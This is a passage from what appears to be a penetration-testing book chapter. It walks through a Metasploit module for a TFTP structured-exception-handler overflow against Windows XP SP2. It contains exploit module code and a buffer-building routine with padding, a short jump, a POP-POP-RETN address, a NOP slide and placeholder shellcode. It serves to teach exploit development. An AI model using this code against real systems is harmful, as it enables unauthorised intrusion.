228
Chapter 15
'Payload' =>
{
'Space' => 412,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2', { 'Ret' => 0x41414141 } ],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 3 2008'))
register_options([
Opt::RPORT(69)
], self.class)
end
def exploit
connect_udp
print_status("Trying target #{target.name}...")
udp_sock.put(sploit)
disconnect_udp
end
end
Because this exploit uses the Trivial File Transfer Protocol (TFTP), we
need to include the
Msf::Exploit::Remote::Udp
mixin shown at . And because
it manipulates the structured exception handler, we also need to include the
Msf::Exploit::Remote::Seh
mixin shown at to gain access to certain functions
that deal with SEH overflows. Because TFTP servers typically listen on UDP
port 69, we declare that port at as the default for the module. Lastly, once
the malicious string is built, the code is put on the wire at .
We begin by using the same skeleton from our original Python exploit
earlier in this chapter for the TFTP exploit. We will be adding the major
parts of it into our exploit section.
def exploit
connect_udp
print_status("Trying target #{target.name}...")
evil = "\x41" * 1019
evil << "\xeb\x08\x90\x90"
# Short Jump
evil << "\x58\x14\xd3\x74"
# POP-POP-RETN
evil << "\x90" * 16 # NOP slide
evil << "\xcc" * 412 # Dummy Shellcode